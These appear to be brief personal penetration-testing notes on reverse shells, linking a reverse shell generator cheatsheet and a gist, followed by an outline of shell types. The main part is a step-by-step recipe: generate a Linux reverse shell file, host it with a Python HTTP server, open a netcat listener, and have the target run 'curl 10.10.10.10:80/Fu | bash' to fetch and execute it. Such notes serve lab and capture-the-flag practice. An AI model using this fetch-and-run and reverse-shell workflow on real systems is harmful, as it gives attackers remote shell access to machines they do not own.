Online - Reverse Shell Generator
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#summary
Linux multi one
https://gist.github.com/xct/ab71d58a29e9017eb38565e32aeb95b0
it generated multiple format of Linux reverse shell to try once
create the file
python3 resh.py <lhost> 4444 Fu
create http server
python3 -m http.server 80
start listner
rlwrap nc -nlvp 4444
execute it
curl 10.10.10.10:80/Fu | bash
Cheat Sheet
Types of shell
Windows Shells
web shell
TTy
python